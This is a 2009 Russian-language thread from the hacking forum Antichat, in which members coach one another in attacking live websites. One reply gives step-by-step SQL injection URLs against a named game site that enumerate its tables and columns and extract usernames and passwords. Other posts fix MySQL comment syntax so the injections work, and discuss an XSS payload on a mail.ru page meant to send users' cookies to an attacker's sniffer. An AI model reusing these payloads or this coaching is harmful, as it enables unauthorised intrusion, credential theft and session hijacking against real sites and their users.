Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.07.2009, 11:12
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
Сообщение от mailbrush
Staratel, изменять даных в инъекциях нельзя.
Поспорю...
В PostgreSQL injection можно исполнять команды... Следовательно можно и изменять информацию в БД (если прав хватит)
|
|
|
17.07.2009, 11:15
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
если скуля в update, insert, delete то можно изменять(в рамках запроса конечно же, и уязвимых переменных)
|
|
|
|
17.07.2009, 11:18
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
В PostgreSQL injection можно исполнять команды... Следовательно можно и изменять информацию в БД (если прав хватит)
И в MsSQL тоже, и еще в нескольких БД.
Я говорил про MySQL и про SELECT.
|
|
|
|
17.07.2009, 12:39
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
Сообщение от Staratel
РЕБЯТА ПОМОГИТЕ ПОЖАЛУЙСТА!!!!!!!!!!!!!!!!!!!!!!!!
Покажите примерчик скл уязвы какой нить как в ней правильно изменить переменные
с update или другой..
Спасиба!
Код:
http://milw0rm.com/papers/149
прочти, может ето то, что ты искал;-) Ах да, погугли по милворму типа, add new user, insert, update, посмотри примеры в сплоитах.
Последний раз редактировалось The_HuliGun; 17.07.2009 в 12:43..
|
|
|
|
17.07.2009, 12:40
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
чтото не то =\\
провожу sql иньекцию ..када синтаксис не верен выводит ошибку синтаксиса .. а когда отправляю правильный запрос(с теми изменениями что мне нужны конечно) скрипт плюётся и выводит Invalid query: No database selected
в чём может быть трабл ? когда код без изменений( тоесть без иньекции) то всё норм работает =\\
пс и коментрии страно срабатывают ..
/* - работает только если его потом закрыть
-- работает странно както если сделать
union select 1,2,3,4((1='1 AND (ishidden=0))
он напишет
Код:
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '((1='1') AND (ishidden=0))' at line 1
а если union select 1,2,3,4--((1='1 AND (ishidden=0))
напишет
Код:
Invalid query: Unknown column 'ishidden' in 'field list'
тоесть срабатывает как робел Оо
а # вще не срабатывает =\\
Последний раз редактировалось Doom123; 17.07.2009 в 13:01..
|
|
|
|
17.07.2009, 13:09
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
Сообщение от wolmer
http://torg.mail.ru/337/res/?p3[price_from]=&p3[price_to]=&p3[delivery_id]=&p3[vendor_id][]="> XSS
Собственно подставил ссылку на сниффер но не работает (точнее отчета лога нету) 
Попробуйте ща потестить на своем сниффере... если все норм то дайте ваш запрос чтобы куки просылались (я потом изменю на свой сниффер) Ап
|
|
|
|
17.07.2009, 13:24
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Doom123
1. это происходит когда в коде нет выбора БД перед запросом т.е. нет например такого
Код:
mysql_select_db('mysql');
, а сам sql запрос выглядит например так:
Код:
$sql = "SELECT Host,User,Password FROM mysql.`User` where max_questions=".$id;
т.е. при выборке в FROM указывается не только таблица, но и БД. Когда после этого ты ставишь union select ... from blabla ты не указываешь БД, и поэтому запрос возвращает ошибку что бд не выбрана.
2. 5 ветка требует закрытых /* коментов (как mssql) а перед и после -- должны стоять пробелы, и # в ГЕТ запросе нужно заменять на %23
__________________
Карфаген должен быть разрушен...
|
|
|
|
17.07.2009, 14:03
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 4
Провел на форуме:
4330
Репутация:
0
|
|
где можно найти пароль? я узнал только логин отсюда:
http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11+fr om+information_schema.tables+limit+23,1--
а пароль найти не могу, всего таблиц 27-28... помогите найти
п.с. я новичек, поэтому нетрогайте сайт дайте мне потренироваться...гыг
|
|
|
|
17.07.2009, 14:22
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
Сообщение от blase-
где можно найти пароль? я узнал только логин отсюда:
http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11+fr om+information_schema.tables+limit+23,1--
а пароль найти не могу, всего таблиц 27-28... помогите найти
п.с. я новичек, поэтому нетрогайте сайт дайте мне потренироваться...гыг
Так проще, узнал допустим таблицу:
Код:
_http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_name,table_schema),7,8,9,10,11+from+information_schema.tables+limit+23,1--
Узнал колонки:
Код:
_http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,column_name),7,8,9,10,11+from+information_schema.columns+where+table_name=0x6C6F67696E+limit+0,1--
Достал информацию, которая тебе нужна:
Код:
_http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,psw),7,8,9,10,11+from+tgp_gamedb.login+limit+0,1--
А так, читай статьи, юзай SIPT.
Последний раз редактировалось The_HuliGun; 17.07.2009 в 14:51..
|
|
|
|
17.07.2009, 15:45
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
"><script>alert(document.cookie)</script> получается выполнить.
при подстановке ссылки на сниффер ничего не получается (проверено несколькими людьми), видимо что-то фильтруется.
короч ищи другую xss)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
